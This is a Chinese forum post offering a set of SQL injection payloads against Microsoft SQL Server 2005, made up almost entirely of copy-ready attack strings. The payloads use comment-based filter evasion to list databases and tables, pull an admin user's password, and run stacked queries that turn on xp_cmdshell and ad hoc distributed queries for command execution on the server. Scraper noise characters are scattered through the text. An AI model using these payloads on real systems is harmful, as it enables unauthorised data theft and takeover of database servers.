找回密码
 立即注册
查看: 3064|回复: 0
打印 上一主题 下一主题

MSsql2005注入语句

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:19:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/ I8 t6 P1 ~- Q3 z* g0 E# j

8 |: K3 j2 j1 V1 V, S: `  j- V
) }) W) C$ t! g! j* d[Copy to clipboard]CODE:
- s2 i; P" i% y! _% E7 X! r( W4 t. V  ]8 M/**/and/**/(select/**/top/**/1/**/isnull(cast([name]/**/as/**/nvarchar(500)),char(32))%2bchar(124)/**/from/**/[master].[dbo].[sysdatabases]/**/where/**/dbid/**/in/**/(select/**/top/**/1/**/dbid/**/from/**/[master].[dbo].[sysdatabases]/**/order/**/by/**/dbid/**/desc))%3d0--
& S1 O5 A9 K/ L# R3 L7 {4 R" h- [, F7 G
爆表语句,somedb部份是所要列的数据库,红色数字1累加: @5 |* B# S3 f. `7 T$ J

6 f. z* K! x  J1 a7 }' s1 i$ K# O$ H& ~' I+ [# N# L, b- D9 n4 ^6 F$ y
[Copy to clipboard]CODE:
) A% r0 O( B" e, F4 D7 S1 M( ~/**/and/**/(select/**/top/**/1/**/cast(name/**/as/**/varchar(200))/**/from/**/(select/**/top/**/1/**/name/**/from/**/somedb.sys.all_objects/**/where/**/type%3dchar(85)/**/order/**/by/**/name)/**/t/**/order/**/by/**/name/**/desc)%3d0--
2 E5 ~% f3 ~7 {
4 Z6 L3 ~3 O! q* X, \$ l爆字段语句,爆表admin里user='icerover'的密码段
) @/ `1 V0 [$ j6 E% ~3 L5 o, m- _# M. i, P4 o( r; T
- M& S7 C4 Z2 D8 z
[Copy to clipboard]CODE:
6 T0 ^, D. V' ^, V8 w# ~0 _**/And/**/(Select/**/Top/**/1/**/isNull(cast([password]/**/as/**/varchar(2000)),char(32))%2bchar(124)/**/From/**/(Select/**/Top/**/1/**/[password]/**/From/**/[somedb]..[admin]/**/Where/**/user='icerover'/**/Order/**/by/**/[password])/**/T/**/Order/**/by/**/[password]Desc)%3d0--
4 ]9 @4 |, O/ o' f' a" h
& b* ?1 |( z) o7 `mssql2005默认没有开xp_cmdshell的,openrowset也不能用
2 v8 k5 ?, X! h: s! V! _如果是sa权限,可以这样来开启
4 N( w8 K6 t. D6 ~( e( n开启openrowset
( Q6 r+ @# T% e" c5 `5 v* @
5 F8 p% ~) Y- @) f. i& U; w1 V! I. p& m
[Copy to clipboard]CODE:
6 A$ v( V( j! L: B/**/sp_configure/**/'show/**/advanced/**/options',/**/1;RECONFIGURE;--0 M, f, H! `# w. X6 X; }
/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',/**/1;RECONFIGURE;--
# M* S6 w2 p+ n+ p" M# \& M1 f
7 X. h9 E8 }+ v. _  f. p: I  Y开启xp_cmdshell
' G" M3 m6 M: W1 }/ B' u& S7 \! Q5 O% H8 m: |2 [4 M  d
8 ^8 S+ J# l+ N7 s% z3 ~$ P$ R
[Copy to clipboard]CODE:- A8 R  T/ ^3 n2 P/ A
EXEC/**/sp_configure/**/'Ad/**/Hoc/**/Distributed/**/Queries',1;RECONFIGURE;--) |) \9 N/ x  i% [( Z) }4 m2 w
EXEC/**/sp_configure/**/'show/**/advanced/**/options',1;RECONFIGURE;EXEC/**/sp_configure/**/'xp_cmdshell',1;RECONFIGURE;--
! g8 X9 x; S& S% l- g6 z& V! Y6 v3 r% Y' z" M* t
ok,over~~晚安8 Z! V3 G5 f2 N6 H+ A
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表